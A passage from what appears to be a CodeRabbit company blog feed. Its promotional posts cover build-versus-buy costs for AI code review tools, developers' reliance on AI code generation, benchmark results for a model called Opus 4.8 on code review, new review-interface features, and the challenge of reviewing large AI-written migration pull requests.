benchmarks are derived from [Attio's publicly documented implementation](https://attio.com/engineering/blog/building-better-software-with-ai), scaled for org size based on what we consistently see in practice. For a mid-enterprise org of 700 to 1,500 engineers, a realistic build team is 4 to 8 engineers spanning backend, infrastructure, and ML/prompt engineering roles, typically with one PM, over a 3 to 6 month build window. For large enterprise organizations at 2,500 to 4,000 engineers, that scales to 6 to 12 engineers. All FTE costs assume $180k to $250k fully loaded (base salary, benefits, equity, and overhead), which is consistent with [industry benchmarks for senior engineering roles](https://www.mrjrecruitment.com/resources/blog/the-definitive-ai-engineering-salary-benchmarks--2026-us-market-report/) in this space. At those numbers, the annualized cost of a maintained internal tool for a mid-enterprise org runs somewhere between $650,000 and $2 million. That range accounts for the ongoing maintenance team, initial build costs amortized over three years, model and API costs that tend to run $100,000 to $500,000 at that scale, and the infrastructure and operational overhead that accumulates as the tool becomes load-bearing across the organization. For enterprise organizations at 2,500 to 4,000 engineers, the spread is wider. Building internally at that scale requires what amounts to a full product team: six to twelve engineers, a PM, compliance and security layers, and model costs that can exceed $2 million annually. Total cost: $2.35 million to $7.5 million per year, before accounting for the opportunity cost of the engineering teams building and maintaining it over time. ## What the internal tools actually run into The cost model alone does not tell the whole story. The harder problem is that internal AI code review tools tend to follow the same failure patterns regardless of how good the initial implementation is. 1. **The first is cost overrun:** As the initial build often lands on budget. What teams underestimate is that maintenance costs grow as the tool sees broader adoption, model costs accumulate, and reliability expectations rise across the org. By year two, the internal tool frequently costs more to run than a purpose-built external solution would have from day one. 2. **The second is low adoption:** From our conversations with engineering teams, there are two main reasons for low adoption of internally built AI code review tools. The first is that they produce low quality reviews that lack context on the codebase and dependencies. The second is lack of integration into existing workflows, like with the developer's choice of agent. When integration is shallow, human reviewers continue carrying the load as the tool runs in the background without changing much. 3. **The third is outright sunset:** PR volume accelerates, often driven by AI coding agents, faster than internal tooling can keep up with. Signal-to-noise deteriorates. Developers stop trusting the output. The project gets shut down and teams return to fully manual review at a volume that senior engineers cannot absorb. These are not edge cases, they are the three most common outcomes we see from organizations that have gone through this cycle. ## So, should you build or should you buy? [Writer](https://www.coderabbit.ai/case-studies/buy-vs-build-why-writer-bought-their-ai-code-review-tool), an AI-native company had the technical capability to build an AI code review tool. Their engineering team evaluated the option and concluded the resource cost was not justified. The time it would take to build something production-grade would pull engineers away from the core product. The ongoing maintenance would do the same thing indefinitely. They chose CodeRabbit, and it now runs across more than 37 repositories, with review cycles 30% faster. The engineering team that would have been building and maintaining an internal tool is building Writer instead. A large global internet company built their own code review tool in-house. For a while it worked, then, they needed to scale from a few hundred developers to close to 3,000. Their homegrown tool couldn’t get there. Beyond the scaling problem, keeping the tool running was costing them close to $1M a year in maintenance alone with engineering hours and resources going toward an internal tool instead of the product. They chose CodeRabbit and decided to leave behind their homegrown tool alongside the maintenance burden that came with it. That is the actual question for most engineering leaders: what is this team's core competency? If it is the product you are selling, an internal AI code review platform is probably not the best use of the engineers you have. The maintenance burden, covering scale, upgrades, security, on-call, noise tuning, and knowledge continuity as teams change, is real and it grows. ## The case for buying If you are seriously evaluating whether to build internally, run the numbers on your specific org size before scoping the project. Token costs, engineering headcount, PR volume, and infrastructure requirements all affect the calculation differently depending on where you are. The gap between build and buy tends to be larger than teams expect at the start of the evaluation, and it widens as the org grows. That’s because production-grade AI code review is more than a single LLM prompt reviewing a diff. CodeRabbit has spent the last three years refining our context engine across millions of pull requests and more than 15,000 engineering teams. That accumulated domain expertise, knowing which context matters for which kind of change, is the difference between a system that summarizes diffs and one that finds the issues that could derail what you intended to ship. CodeRabbit combines sandboxed repository analysis, specialized AI agents, autonomous code exploration, persistent memory, and integrates with 40+ linters and security scanners to understand your codebase at a much deeper level. We built a calculator that lets you model your specific context, covering team size, PR volume, and fully-loaded engineer cost. It is available in our full [Build vs. Buy guide](https://www.coderabbit.ai/whitepapers/build-vs-buy-ai-code-review-guide) with detailed cost breakdowns for mid-enterprise, and enterprise scenarios.

You’re addicted to AI code generation. Now what?

David Loker — Tue, 02 Jun 2026 00:00:00 GMT

Software engineers are rapidly building a psychological reward loop around tools they only partially trust. It is, indeed, a strange paradox of sorts. Developers distrust these assistants just enough to double-check their work, yet they rely on them enough to keep them permanently open in their IDEs. The immediate challenge for engineering organizations isn't deciding whether to use AI, but rather designing production systems that can handle this unprecedented influx of code without burying teams under a mountain of verification debt. ![Habit loop diagram showing Trigger, Routine, Reward, and central Reward Loop.](https://victorious-bubble-f69a016683.media.strapiapp.com/Internal_reward_loop_image_cc0008c6e6.png) If you want to see how deeply ingrained this has become, try turning off your coding assistant for a single afternoon. Without AI, development reverts to its traditional, deliberate pace. You start by digging through documentation, manually tracing unfamiliar modules, and facing a blank file trying to figure out where to begin. You might copy a design pattern from a neighboring microservice, slowly writing the first iteration line by line while trying to hold the broader architecture, edge cases, and business logic entirely in your head. With an AI assistant, your entire entry point shifts. Instead of staring at a blank screen, you ask the model to explain the module, outline the likely call path, and offer perhaps three different implementation approaches. You have it scaffold the basic service, draft the database migration, and sketch out the initial test cases. While you still have to evaluate and correct the output, you are starting the day reacting to an existing draft rather than building from scratch. This shift in momentum is exactly what makes working without an assistant feel so jarring. The core responsibilities of the job haven't changed, but the tempo clearly has. Without the AI-coding tool, you lose the instant second opinion, the built-in explainer, and the immediate gratification of seeing a prompt materialize into a functional boilerplate. The work is entirely doable, but it feels significantly heavier once your daily workflow has adapted to that accelerated feedback loop. This structural shift in the software development lifecycle is an addiction or even stronger than an addiction. The genie is out of the bottle, and there’s no going back. Let’s face it, software engineers have developed a functional dependency on a tool that provides immediate feedback. You prompt, edit, accept, and run the code in a continuous cycle. Sometimes the solution is incredibly elegant. Sometimes it is entirely wrong but highly confident. Often, it is just close enough to keep you moving forward. Ultimately, AI tools have fundamentally changed the day-to-day experience of programming. ## From tech novelty to muscle memory AI code generation has quickly transitioned from a tech novelty to muscle memory. According to [Stack Overflow’s 2025 Developer Survey,](https://survey.stackoverflow.co/2025/) 84% of respondents were using or planning to adopt AI tools, with over half of professional developers utilizing them daily. [JetBrains reported](https://blog.jetbrains.com/research/2025/10/state-of-developer-ecosystem-2025) similar findings, noting that 85% of developers regularly use AI tools in their development process, and 62% rely on a dedicated AI coding assistant or editor. At major tech companies, the adoption curve is steep. In early 2026, Google CEO Sundar Pichai [noted](https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/cloud-next-2026-sundar-pichai) that 75% of all new code at the company was AI-generated and subsequently reviewed and approved by engineers. That’s a significant jump from 50% just six months prior. He highlighted a complex code migration that was completed six times faster through human-agent collaboration than would have been possible using traditional methods. The key phrase here is *AI-generated and approved by engineers*. The shift is here to stay, and the real opportunity lies in building robust review systems that help teams translate this engineering speed into secure, stable production code. Historically, writing code was expensive and time-consuming. Engineering organizations built their cultures around that scarcity through structured sprint planning, estimates, peer reviews, and strict release trains. Today, drafting code is cheap. But trusting it remains exceptionally resource-intensive. This is the new economic reality of the software engineering addiction. To be sure, code generation is abundant, but verification is scarce. ## Addiction rhymes with contradiction The most glaring contradiction in modern software development is that engineers are using AI more while trusting it less. The Stack Overflow survey also found that 46% of developers actively distrust the accuracy of AI tools compared to only 33% who trust them. Unsurprisingly, senior engineers were the most skeptical demographic. Paradoxically, this behavior sounds entirely contradictory on paper, but it makes complete sense as a practical workflow decision. AI assistants reduce the cognitive friction of getting started. They turn a daunting, empty file into an editable draft, convert an unfamiliar codebase into a conversational QA session, and quickly build out repetitive test suites. Traditional, or manual-first software development is plagued by tiny, annoying frictions like hunting down a forgotten method signature, navigating poorly documented internal conventions, or writing rare migration syntax. AI smooths over these roadblocks just enough to keep the developer moving forward. Behavioral research shows that variable rewards and rapid uncertainty resolution can make digital experiences highly compelling. AI coding assistants mirror this pattern perfectly. One prompt generates standard boilerplate, the next hallucinated an internal library, the third hits the exact solution, and the fourth delivers a broken implementation wrapped in flawless formatting. AI acts less like outsourcing and more like a tool that sustains your personal creative momentum. ## Productivity metrics meet reality The productivity gains are real, but they come with strings attached. [DORA’s 2025 research](https://dora.dev/research/2025/dora-report) indicated that 90% of tech professionals use AI at work, with over 80% reporting a noticeable boost in productivity. AI excels at explaining complex logic, translating languages, generating initial test coverage, and minimizing the drag of routine tasks. It helps junior developers self-start and frees up senior engineers from tedious boilerplate. However, productivity metrics in software engineering have always been difficult to isolate. A single developer can feel incredibly fast while the broader organization slows down. A team might close more tickets and push more code, only to dramatically increase their code review burden and quietly introduce architectural flaws, security vulnerabilities, and operational surprises down the line. A 2025 [randomized controlled trial by METR](https://metr.org/blog/2025-07-10-early-2025-ai-experienced-os-dev-study/) illustrated this tension clearly. In a study involving experienced open-source developers working inside familiar repositories, engineers actually took 19% *longer* to complete tasks when allowed to use AI tools. While METR’s [2026 update](https://metr.org/blog/2026-02-24-uplift-update/) noted that newer models have likely improved this speed metric, it also emphasized that measuring true productivity has become much more complex as adoption spreads. DORA’s 2026 [updated analysis](https://dora.dev/insights/balancing-ai-tensions), meanwhile, offers an accurate framework for this shift. AI accelerates the initial creation of code, but the time saved during the drafting phase is simply reallocated to auditing, testing, and verification downstream. Consequently, higher AI adoption has been statistically linked to both an increase in delivery throughput and an increase in software deployment instability. Think of AI as a multiplier for whatever environment it drops into. If a team already has robust automated guardrails through strict linting, heavy test coverage, and comprehensive integration environments, they can safely handle this influx of code. But if an organization is already struggling with flaky tests, fuzzy code ownership, and slow review cycles, these tools just help them pile up technical debt at a terrifying new speed. The old workflow used to be about writing, reviewing, and merging. The new reality is about generating, verifying, and taking actual accountability for the output. ## From raw code production to system stewardship AI-generated code looks highly professional on the surface. It uses standard naming conventions, includes helpful comments, and mimics existing codebase patterns. This polished appearance can easily distort the psychology of a code review. While messy code practically begs to be challenged, clean-looking code encourages quick approval. The most dangerous architectural failures such as missed multi-tenant separation, weak permission boundaries, or subtle race conditions hide easily behind this visual confidence. Data from CodeRabbit’s [2025 analysis of open-source pull requests](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) suggested that AI-assisted changes averaged roughly 10.83 issues per PR, compared to 6.45 for entirely human-authored code. Third-party analysis by *The Register* [noted](https://www.theregister.com/software/2025/12/17/ai-authored-code-needs-more-attention-contains-worse-bugs/) that this shouldn't be a reason to abandon AI tools altogether, but rather an indicator of a shifting review burden. AI introduces errors at a different scale and volume than traditional coding. Because of this, the role of the developer is shifting away from raw code production toward system stewardship. When drafting code becomes trivial, human value centers on intent, architecture, risk management, and ultimate ownership. Rather than focus on syntax, senior engineers must learn to dictate explicit constraints when it comes to security assumptions, performance expectations, data boundaries, and more. A thorough, AI-assisted engineer has to ask targeted system questions: * What architectural invariants must this code preserve? * Where could this change introduce regressions across different user roles or regions? * What specific test would fail if the model misunderstood our internal business logic? * Does this proposal duplicate an existing internal abstraction? ## Channeling the prompter’s high To adapt to this environment, engineering teams need to modernize their code review rituals rather than restrict tool usage. The goal is to make AI integration visible, teachable, and strictly aligned with production standards. This requires three core principles: * **Generate openly:** Teams should feel free to use AI as a collaborator for drafting, debugging, and documentation. The organization should focus on whether the final change is fully understood by the author, not whether an AI touched the keyboard. * **Verify aggressively:** Automated testing, security scanning, and observability must keep pace with generation speed. The faster a draft appears, the faster the feedback loop needs to react. * **Own completely:** Blaming an AI for a production outage carries the same weight as blaming a compiler. It describes the mechanism of failure but absolves no one of responsibility. In practice, feeding this AI tool dependency means teams have to completely change how they police code. Since the addiction to instant drafting inevitably floods repositories with massive diffs, teams must learn to prioritize reviewing systemic risk over cosmetic code style. Survival requires paying ruthless attention to data access, concurrency, and security boundaries while consciously protecting deep focus time from the compulsion of constant prompting. Ultimately, the goal is to design an engineering system that channels this craving for momentum into deliberate judgment. AI tools excel at feeding that developer need for immediate progress and in turning friction into instant motion. The teams that thrive won't try to cure the addiction. Instead, they will graduate from treating it as a private productivity fix and start managing it as a core, high-volume workflow.

You can build an AI code reviewer. But you probably can’t maintain it

Yiwen Xu — Mon, 01 Jun 2026 00:00:00 GMT

A VP of Engineering at an enterprise we work with put the question plainly on a call recently: *"Can we build it ourselves? How difficult can it be to build CodeRabbit?"* A few weeks later, in a different conversation with a different enterprise, the answer arrived as an architecture diagram. CodeRabbit appeared in a single box labeled "Compliance Layer and the Guardrails," sitting above coding agents and engineers that ship code. Not an AI reviewer or code review tool but the compliance layer. That bar is what enterprise buyers are actually buying. It's the part homegrown AI reviewers fail to deliver. The hard part isn't the first demo. It's holding a consistent, unified quality bar across hundreds of engineers, dozens of teams, and an AI tooling landscape that shifts constantly. And, then making sure the standard actually gets enforced. Those, and others, are the real problems CodeRabbit was built to solve. ## What consistency actually means Code in a modern engineering org comes from more places than it used to with more agents, more teams, and more generations of the tech stack. Consistency in review is how the standard survives the variety. That consistency has to hold across three moving targets, where the code lands, who (or what) wrote it, and what your team adopts next. A homegrown AI code reviewer usually starts with one repo, one workflow, and one team member’s preference. That can work for a pilot but it breaks when the standard has to follow every team, every tool, and every code path. CodeRabbit acts as the independent verification layer that holds the same quality bar across three moving targets: **Same review, wherever the code lands:** GitHub, GitLab, Azure DevOps, Bitbucket, plus CLI and IDE for inline feedback. The AI reviewer is the same on every surface where your team ships. **Same review, whoever wrote the code:** Junior developer, senior engineer, Cursor, Copilot, Claude Code, Codex. Every PR gets reviewed against the same bar, with the same depth of context. **Same review, whatever your team adopts next:** As your team adopts new coding agents and AI tools, the reviewer moves with you. Your standards stay intact, without forcing you to rebuild the review system every time the stack changes. ## What makes a high-quality review trustworthy? Now your AI reviewer covers every surface, every author, every coding agent your team uses. The next question is whether what it says is worth reading and actionable. The review has to earn trust: feedback grounded in your codebase, your team's rules, and what your team has already learned. CodeRabbit grounds every review in all three, and gets better with use. **Reviews grounded in your context:** CodeRabbit’s context engine leverages code graph, multi-repo dependencies, prior PR discussions, ticketing systems, docs, systems via MCP, and knowledge base. We have been building this for over three years across 15,000+ teams and 2M PRs reviewed per week. **Reviews tuned to your standards:** You set the path instructions, configurations, custom checks and code guidelines that matter to your team. Every review respects them. The comments are specific to your codebase, not like generic rules your team has learned to tune out. **Reviews improved by every learning:** When one engineer teaches the AI reviewer a standard, a naming convention, a security rule, or a path-specific instruction, the rest of the team benefits. The reviewer gets sharper with use, and that learning compounds across the organization. Many teams assume they need to build their own review system to fit their workflow, incorporate their context, and make reviews relevant to their codebase. But that is a misconception. CodeRabbit is built to adapt to how teams work and is highly customizable. Teams can connect their ticketing systems, bring in additional data and internal systems through MCP, and use custom instructions and configurations to make reviews reflect their standards and preferences. Unlike a DIY system, CodeRabbit can scale and evolve as teams grow, workflows change, and the tooling landscape shifts, without requiring teams to rebuild and maintain the review infrastructure themselves. The result is code review that is high-quality, explainable, and easy to act on. That is why one enterprise customer described CodeRabbit as both a “safety net for code” and a “24/7 mentor” helping developers catch issues while also understanding the engineering practices behind them. ## Turning quality standards into compliance gates Consistency and quality are the floor. Compliance is what makes the floor enforceable. An AI reviewer that finds the right issue but lets the PR merge anyway isn't a quality gate. That is why the enterprise customer we mentioned earlier did not label CodeRabbit “an AI reviewer” in their architecture diagram. They labeled it the “Compliance Layer.” Under that label were three jobs, a safety net for the code, automated governance for the standards, and a coaching loop for developers. CodeRabbit brings products that make the standard easy to define, enforce, and improve over time. **Pre-Merge Checks, the automated governance.** Codify your team's Golden Paths standards, for example, *"always use the Finance API for currency conversion"* into automated quality gates that evaluate every pull request and fail until critical issues are resolved. Built-in checks cover the basics every team expects including docstring coverage, PR titles, descriptions, and linked-issue alignment. Custom checks enforce the rules linters miss such as sensitive data in logs, hardcoded credentials, breaking-change documentation, and migration safeguards. In the CodeRabbit dashboard, you can see which checks are running, where they’re passing or failing, and what needs to be improved to keep standards enforced. **Finishing Touches, turning fixes into enforceable remediation.** Finishing Touches turns repeated fixes into repeatable remediation workflows. CodeRabbit can generate missing docstrings, write unit tests, resolve merge conflicts, and run team-specific cleanup recipes for import ordering, type tightening, and project conventions. The goal is more than just catching issues. It’s to help developers get them fixed before they merge while keeping the team’s standards intact. **Global Overrides, the org-wide policy lever.** Compliance breaks down when every team manages its own version of the rules. One team updates .coderabbit.yaml, another tweaks it, a third leaves it untouched and suddenly the “standard” means something different in every repo. Global Overrides let org admins set the configuration once, such as for required path instructions for sensitive code, mandatory review profiles, and security rules. CodeRabbit applies them on the next PR across every repository, regardless of what individual repos have in their config. Together, these features turn a consistent AI reviewer into a closed-loop compliance system. Set the policy, monitor adoption, and enforce it across every team with a dashboard to give you visibility and insights for improvement. ## The question to ask before you build If your team is weighing build vs. buy, ask yourselves the following questions **On consistency:** * Is every PR reviewed against the same bar, whether a junior developer wrote it or an AI agent did? * Will the reviewer travel with your team when you adopt the next coding agent or platform? **On quality:** * Are the comments grounded in your codebase and configuration, or boilerplate your engineers learned to ignore? * Does the reviewer get sharper and more useful with use? **On compliance:** * Are policies enforced before merge, not just flagged after? * When one team rewrites their config or quietly drops a check, does the org-wide standard still apply? That’s the bar. CodeRabbit is built to hold it across every repo, team, and coding agent. A DIY reviewer may catch issues in a narrow workflow, but it usually stops there. Most importantly, a DIY reviewer does not become the system of record for how engineering standards are verified, enforced, and improved over time. That is the real build-vs-buy question. Do you want your engineering team maintaining review infrastructure, or building the products only they can build? **See it for yourself.** [Try CodeRabbit for free](https://app.coderabbit.ai/login???free-trial) on your repos.

Opus 4.8 benchmark results for AI code review and code generation

Juan Pablo Flores — Thu, 28 May 2026 00:00:00 GMT

Anthropic just shipped Opus 4.8. Before its release, we spent some time putting it through its paces, most of it on code review tasks. We ran it against our standard evaluation harness, watched how it behaves on real pull requests, and probed where it holds up and where it strains. Alongside that, we used it for the kind of long-running coding work that tends to break agents before they finish. On review, it lands at parity with some of our tuned production ensemble. The surprise was how much it pulled ahead on code generation and long-horizon agentic sessions. ## **What’s new in Opus 4.8** Three things actually shipped, and everything else is downstream: - ** Long-horizon agentic execution.** Performed well in tasks that span many tool calls without losing the thread. It plans before acting and holds the goal across hours-long sessions. Give it the full spec up front at high effort. Drip-feeding requirements perform noticeably worse. It completed more multi-hour, many-file sessions without dropping the thread than any model we've evaluated, and the same intermediate reasoning shows up in stronger code generation. - **Mid-session system prompts.** The messages array now accepts `{"role": "system", ...}` entries mid-conversation without invalidating prompt caches. The model follows them most reliably as context rather than overrides. It also narrates its plan, second-guesses, and requests more permission than prior Opus versions, all useful behaviors, but ones that require active budgeting and steering. - **Tool-use recalibration.** Web search triggers more often, but runs fewer rounds. Retrieval tools, sub-agents, and memory files trigger less often, defaulting to answering from context. The net effect is high-precision, low-recall behavior, steerable with an explicit instruction. On code review, it lands at parity, with an actionable pass rate of 61% vs 62%, and full-system 72% vs 68% at unchanged precision. But the comment mix shifts and critical findings dipped (35 to 29), which gives us pause. In our “Results” section below, we dig into why, and whether it is recoverable. CodeRabbit is integrating it selectively where its strengths fit, and routing other models that win on cost without sacrificing quality or pass rate. %[https://youtu.be/LzgPzQud0zA] ## **What we tested** We ran Opus 4.8 through the same harness we use for every model release: 100 open-source pull requests sampled across trivial, minor, and major complexity tiers. We compared two thinking configurations (a default escalating medium/high/x-high by tier, and a lower-thinking variant running low/medium/high) against a baseline running our current production model mix on the same PRs. Two metrics drive the analysis: pass rate (the fraction of PRs on which the model surfaced the equivalent of what a senior human reviewer would flag) and precision (the fraction of comments that were actionable rather than noise). "Actionable" is adjudicated by senior reviewers. ## **Results** The default Opus 4.8 config edges past our baseline on full-system pass rate (+4pp, 72% vs 68%) and sits within noise on actionable pass rate (61% vs 62%). Precision holds at 33.8% on actionable comments and ticks up a point on the full system. For a model going head to head with a tuned ensemble on a surface it was not specifically optimized for, that is a strong result, and the cross-file reasoning is clearest on senior-tier PRs. ![Severity distribution bar chart compares Baseline, Opus 4.8 default, and Opus 4.8 One Thinking models.](https://victorious-bubble-f69a016683.media.strapiapp.com/Opus_4_8_image1_c33fb05d6c.png) ![Data table displaying findings by severity for Baseline and Opus 4.8 models.](https://victorious-bubble-f69a016683.media.strapiapp.com/Opus_4_8_image2_5dbc493cf0.png) The comment mix is noisier than baseline, however. Major findings drop from 119 to 81, while minor and nitpick findings both roughly double. The model is shifting volume from the middle of the severity range toward the bottom. The one result that gives us pause is critical findings, which fell from 35 to 29. For a code-review tool, missed criticals matter more than any other category of finding. Our working explanation is that Opus 4.8 follows review instructions literally. Consequently, conservative prompts ("only report high-severity issues") suppress recall more than they did with prior models, and that the higher-severity bug-finding capacity is real once the model is allowed to report broadly and we filter downstream rather than constraining at the source. The lower-thinking variant tells a useful secondary story. Cutting reasoning effort drops precision four points and actionable pass rate five points. Thinking level is a first-class configuration decision. We also found the default config costs more. We measured $0.20 to $0.28 per call against roughly $0.13 for [Opus 4.5](https://www.coderabbit.ai/blog/opus-45-for-code-related-tasks-performs-like-the-systems-architect) and $0.04 to $0.12 for [Sonnet 4.5](https://www.coderabbit.ai/blog/claude-sonnet-45-better-performance-but-a-paradox). On code review alone, the model is at parity, making the premium hard to justify for review-only use. What earns its value is on long-horizon agentic and code-generation work below. That cost-versus-surface tradeoff is exactly why we route it selectively rather than everywhere. ## **Where it struggled** Performance degrades visibly once context crosses 200k tokens. The model slows and starts to miss references and edge cases it would have caught cleanly at lower context windows. This is an observational finding from hands-on use, not a controlled measurement. CodeRabbit's context engine works around this, but teams using Opus 4.8 directly will hit a wall in monorepos and large codebases. ## **What this means for CodeRabbit users** We are integrating Opus 4.8 selectively. Its strengths (cross-file reasoning, long-horizon agentic quality, planning under a single up-front spec) show up most on senior-tier changes. So that is where you will see it engaged. For trivial and junior-tier PRs, we continue routing to the models that win on cost and pass rate at those tiers. For our agentic features, we expect Opus 4.8 to be the strongest backbone we have integrated. If you run Opus 4.8 directly, most existing Opus prompts work without modification. A few tune-ups produced measurable differences in our testing. Start at "high" thinking rather than "x-high" and test across tiers. Front-load the full task context for long-horizon work. Add an explicit search-first or delegation instruction to recover depth on research-heavy work. Drop conservative language from review prompts and filter downstream instead. Name the small decisions the model can make on its own. We will keep evaluating as the model and our harness change. If the picture shifts, we will publish updated numbers.

What's new in CodeRabbit Review: Code Peek, Chat Agent and more

Konrad Sopala — Wed, 27 May 2026 00:00:00 GMT

CodeRabbit Review went live earlier this month. It’s a new review interface that takes a pull request and reorganizes it from a flat file list into ordered cohorts and layers, so you can read the change in the order it was actually built. In the two weeks since its release, a handful of features have landed on top of it. Here's a look at what's new: %[https://youtu.be/FYOYBqIva1Q] ## Cohorts: Independent slices of work in the same PR A modern pull request is rarely one thing, especially when an AI agent wrote it. A single PR can now touch a new data model, the backend that consumes it, an unrelated bug fix, and a config change - all in the same diff. Reading top to bottom means context-switching between unrelated topics every few files. **Change Stack** groups the diff into **cohorts**: small, independent units of related work. Each cohort is its own mini walkthrough, with its own ordered layers, range-specific summaries, and diagrams where they earn a place. You can finish one cohort and pick up the next without having to hold the whole PR in your head at once. For a handwritten 80-line change, this feature may not matter much. But for a 1,400-line AI-authored PR that touches three unrelated concerns, it's the difference between "I'll review this tomorrow" and actually reviewing it now. ## Code Peek: Look up anything without leaving the review ![Code editor shows a diff view of a Kotlin configuration file with highlighted code changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/Code_Peek_602a3cf6b6.png) You're reading a diff hitting a function call and you face quite an obvious question. Where is this defined, and what else calls it? The honest answer for most reviewers is, "I'll open it in another tab and grep around." This usually means a few minutes of orientation, then forgetting where you were in the review. [Code Peek](https://docs.coderabbit.ai/pr-reviews/change-stack#code-peek) removes that detour. Click any variable, function, class, or type name in the diff, and Change Stack looks up its likely definition and usages inline, using GitHub code search and showing the surrounding context, so you can follow the code without leaving the page. When a result points to a file that's actually changed in the PR, an **Open in Change Stack** action jumps you directly to that file. CodeRabbit Review also keeps an in-page back trail, so you can chase a symbol three files deep and still get back to where you started. It's the kind of small thing that makes a long review feel less like an archaeological dig. ## Chat Agent: Ask the PR questions ![Chat conversation in dark mode about app architecture changes related to a pull request.](https://victorious-bubble-f69a016683.media.strapiapp.com/Chat_Agent_098f7bf552.png) Walkthroughs and range summaries answer the questions most reviewers often ask. But sometimes you may have a specific inquiry or request that isn’t covered: - What exactly changed in NotificationDispatcher.kt? - Which layers depend on the dispatcher changes? - Walk me through this storage adapter rename. The **Chat Agent** tab in Change Stack allows you to make those inquiries right where you are working. It has the full context of the PR - every cohort, layer, changed line - and answers in the same view you're already working in. You're not flipping over to a separate chat window to ask the AI to summarize the PR because the AI is already sitting on the same diff you’re in. It's most useful for the kind of question you'd otherwise ask a teammate who wrote the PR. Except no one has to be online for you to ask it. ## Severity Labels: Triage by importance level ![A dark UI shows a 'Notification Event Dispatch System' with description for its 'Notification Events'.](https://victorious-bubble-f69a016683.media.strapiapp.com/Severity_Label_2756b1bf77.png) A long PR begets a long list of CodeRabbit findings, and not every finding is the same. Some are blocking, some are improvements, some are nits. Change Stack now surfaces four severity buckets by which you can filter and group: - Critical - Major - Minor - Trivial These are separate from two other label families CodeRabbit already attaches to comments. **Comment type **tells you what kind of feedback it is: potential issue, refactor suggestion, or nitpick and **Effort** tells you what the fix is worth: quick win, heavy lift, poor tradeoff or low value. Stack the filters together and you can do things like "show me only critical or major potential issues", which is useful when you're deciding whether a PR is shippable in the next hour or genuinely needs a second pass. ## Try them out If you've been opening large AI-generated PRs and bouncing between files trying to reconstruct what depends on what, Cohorts and Code Peek should take a chunk of that work off your plate. If you've ever wanted to ask a PR a question instead of re-reading the whole thing to find the answer, now you can with the Chat Agent. And if your CodeRabbit findings list has been quite long, the severity filters should help you cut through it faster. Change Stack is in early access and currently only available in GitHub. It's available to all users during the launch window and will be part of the Pro+ plan going forward. Click the **Review Change Stack** button in your next CodeRabbit PR comment to try it. [Get started with CodeRabbit](https://app.coderabbit.ai/login?free-trial)

CodeRabbit is now in the Claude Marketplace

Wed, 27 May 2026 00:00:00 GMT

**Starting today, Anthropic customers can apply their existing Anthropic spend commitment toward CodeRabbit. **Simplified procurement. Consolidated AI spend. A single Anthropic invoice for both. Claude is rewriting how software gets built, and it's faster than anyone thought possible. The question now isn’t: _How fast can we write code?_ Instead it’s: _How much do we trust what’s shipping?_ CodeRabbit is the independent quality gate for the agentic SDLC. Agent-agnostic by design, it catches real bugs, explains what's changed and why, and enforces the standards each team actually cares about. More than 15,000 teams trust CodeRabbit to ship agentic code with confidence. >CodeRabbit is the only review tool I trust when running fully autonomous coding loops. * Abhi Aiyer, CTO, Mastra #### Get CodeRabbit through the Claude Marketplace **For Enterprises:** [Contact CodeRabbit](https://www.coderabbit.ai/contact-us) or your Anthropic account team to add CodeRabbit through your [Claude Marketplace](https://claude.com/platform/marketplace) agreement. **For Developers:** [Install CodeRabbit free](https://coderabbit.link/88vkRqF) on any GitHub, GitLab, Bitbucket, or Azure DevOps repo. **Claude writes the code. CodeRabbit makes sure it’s right. The engine of trust for your agentic SDLC.**

AI can migrate your entire codebase. Reviewing it is another story

Santosh Yadav — Tue, 26 May 2026 00:00:00 GMT

Three years ago, I was migrating code that generated a very large diff. My principal engineer was concerned and asked “could we break this PR down into smaller PRs so it would be easier to review.” I explained to them that it was a migration PR, which is why it was much larger than any other PR i’d otherwise submit. ![Values +679 (green) and -34,644 (red) with a five-segment red progress bar.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_f1f4906f7f.png) Migration PRs are common, and companies take them on for many reasons, whether it’s moving from React to Angular or modernizing an aging stack. Before AI, though, these efforts were incredibly time-intensive and typically resulted in massive diffs that were difficult to review. Beyond the migration work itself, one of the biggest challenges organizations face is figuring out how to review these PRs effectively. My own migration experience happened before today’s wave of agentic coding tools and advanced models. Back then, generating the migration was the hard part. Today, AI has dramatically lowered that barrier, and the bottleneck is shifting toward something else entirely: reviewing the large, complex diffs that migrations inevitably produce. ## Did Bun being rewritten in Rust change migrations? One of the biggest and most recent examples of a migration the world saw recently was Bun being rewritten from Zig to Rust. It involved over 1 million lines of code being modified across roughly 2,000 files, over a few days. Yes, you read that right, a few days. ![GitHub pull request for rewriting Bun in Rust, highlighting project details and benefits discussed.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_6c5ceca84c.jpg) In the case of Bun, the project started small and picked a language that was easy to understand and scale. Recently, the project was difficult to scale and dealt with memory leak issues, which was one of the many reasons why Bun migrated off Zig to Rust. Thousands of people were surprised, and even some were angry, as the migration itself was written by AI. I understand the frustration of users, but, it opened up for discussion that migrations at this scale will be more common in the future. ## PR review views were created with the idea that PRs should be small AI coding agents can program in any language, which changes the whole conversation around migrations. Before, teams used to pick a language or framework based on what they were comfortable writing code in, and even hired individuals specifically to the tools they were going to or already use. Slowly, syntax is becoming irrelevant, and the principles and basics of programming as a whole are far more important than ever before. Uncle Bob Martin, famous for his book Clean code, recently wrote on X (formerly Twitter): ![Uncle Bob Martin's tweet emphasizes Clean Code is about structure, not syntax, applying universally.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_0ce12b503b.jpg) [https://x.com/unclebobmartin/status/2055016815047164304](https://x.com/unclebobmartin/status/2055016815047164304) While AI agents are language agnostic for programming, the review process of PRs is still a challenge for organizations or OSS projects, as it’s hard to understand what changed especially in a language you are not familiar with. Sure syntax still matters to an extent, but understanding what is being shipped and discussing it during the PR review is still where most developers struggle, and as PRs are only getting larger, this problem is compounding over time. For years, the PR review view was meant for PRs that are small, so developers could understand what changed during the review process. ## It’s time for a change As a developer, it’s hard to imagine a world before GitHub launched. I still remember sending patches over email to my colleagues, and when GitHub launched and allowed us to see the diff in the browser it changed our code shipping experience as not only an individual but as a team. We all know that with AI writing most of the code nowadays, the size of PRs is only increasing. Despite this new reality, the diff has been the default review interface for nearly two decades. Take the Bun PR everyone is talking about; the PR has more than 1,300 discussions, and all of them are hidden. All useful discussions in the thread are not visible until you expand them. ![Dark-themed code review screenshot displaying feature upgrade, optimization notes, and a user's critical comment.](https://victorious-bubble-f69a016683.media.strapiapp.com/image4_8ea73abe28.jpg) Sure a rewrite of this size is impressive 